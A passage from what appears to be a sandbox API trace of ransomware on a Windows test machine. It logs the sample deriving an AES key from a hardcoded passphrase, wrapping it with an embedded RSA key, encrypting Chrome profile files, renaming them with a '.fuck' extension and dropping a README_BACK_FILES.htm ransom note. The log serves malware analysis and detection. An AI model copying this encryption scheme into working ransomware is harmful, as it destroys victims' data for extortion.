pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.853] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.853] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.853] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.853] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.853] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.853] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.853] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x280, lpOverlapped=0x0) returned 1 [0264.854] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x280, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x290) returned 1 [0264.854] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x290, lpOverlapped=0x0) returned 1 [0264.854] CloseHandle (hObject=0x5d48) returned 1 [0264.854] CloseHandle (hObject=0x5d4c) returned 1 [0264.854] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), bFailIfExists=0) returned 1 [0264.858] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", dwFileAttributes=0x0) returned 1 [0264.858] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.gsg")) returned 1 [0264.860] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage.fuck")) returned 1 [0264.861] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0264.861] CryptDestroyKey (hKey=0x2e7fc40) returned 1 [0264.861] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.861] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.861] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.861] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0264.861] GetLastError () returned 0x0 [0264.861] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\https_www.google.de_0.localstorage")) returned 0x20 [0264.862] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage", dwFileAttributes=0x80) returned 1 [0264.863] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\https_www.google.de_0.localstorage"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0264.863] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\https_www.google.de_0.localstorage.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0264.864] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage.gsg", dwFileAttributes=0x2) returned 1 [0264.865] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2e77398) returned 1 [0264.867] CryptCreateHash (in: hProv=0x2e77398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0264.867] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0264.867] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.867] CryptDeriveKey (in: hProv=0x2e77398, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e7fc40) returned 1 [0264.867] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.867] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0264.867] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2e77420) returned 1 [0264.868] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77420, dwCertEncodingType=0x1, pInfo=0x2eaeae0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaeb10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaeb18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e7eb00) returned 1 [0264.868] CryptEncrypt (in: hKey=0x2e7eb00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0264.868] CryptEncrypt (in: hKey=0x2e7eb00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e77b90*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2e77b90*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0264.868] WriteFile (in: hFile=0x5d48, lpBuffer=0x2e77b90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2e77b90*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0264.869] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.888] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.888] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.899] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.899] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.899] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.899] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.899] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0264.899] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0264.899] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9cacc*=0x180, lpOverlapped=0x0) returned 1 [0264.900] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x180, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9cacc*=0x190) returned 1 [0264.900] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9cacc*=0x190, lpOverlapped=0x0) returned 1 [0264.900] CloseHandle (hObject=0x5d4c) returned 1 [0264.900] CloseHandle (hObject=0x5d48) returned 1 [0264.900] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\https_www.google.de_0.localstorage.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\https_www.google.de_0.localstorage"), bFailIfExists=0) returned 1 [0264.905] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage", dwFileAttributes=0x0) returned 1 [0264.905] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\https_www.google.de_0.localstorage.gsg")) returned 1 [0264.917] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\https_www.google.de_0.localstorage"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\https_www.google.de_0.localstorage.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\https_www.google.de_0.localstorage.fuck")) returned 1 [0264.919] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0264.919] CryptDestroyKey (hKey=0x2e7fc40) returned 1 [0264.919] CryptReleaseContext (hProv=0x2e77398, dwFlags=0x0) returned 1 [0264.919] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.919] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0264.919] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0264.920] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\readme_back_files.htm")) returned 0xffffffff [0264.920] AreFileApisANSI () returned 1 [0264.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0264.920] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0264.922] GetFileType (hFile=0x5d40) returned 0x1 [0264.922] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0264.923] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.923] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.923] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.923] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.923] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.923] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.923] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.923] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.923] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.935] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0264.935] GetLastError () returned 0x0 [0264.935] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db")) returned 0x20 [0264.936] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db", dwFileAttributes=0x80) returned 1 [0264.936] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0264.937] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0264.938] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.gsg", dwFileAttributes=0x2) returned 1 [0264.938] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2e7a500) returned 1 [0264.940] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0264.940] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0264.940] CryptHashData (hHash=0x2e7fb00, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.940] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fb00, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2e7fc00) returned 1 [0264.940] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.940] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0264.940] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2e777d8) returned 1 [0264.940] CryptImportPublicKeyInfo (in: hCryptProv=0x2e777d8, dwCertEncodingType=0x1, pInfo=0x2eb09c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb09f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb09f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2e7fc40) returned 1 [0264.940] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0264.941] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76d38*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2e76d38*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0264.941] WriteFile (in: hFile=0x5d48, lpBuffer=0x2e76d38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2e76d38*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0264.941] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.943] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.943] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.951] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.952] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.952] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] 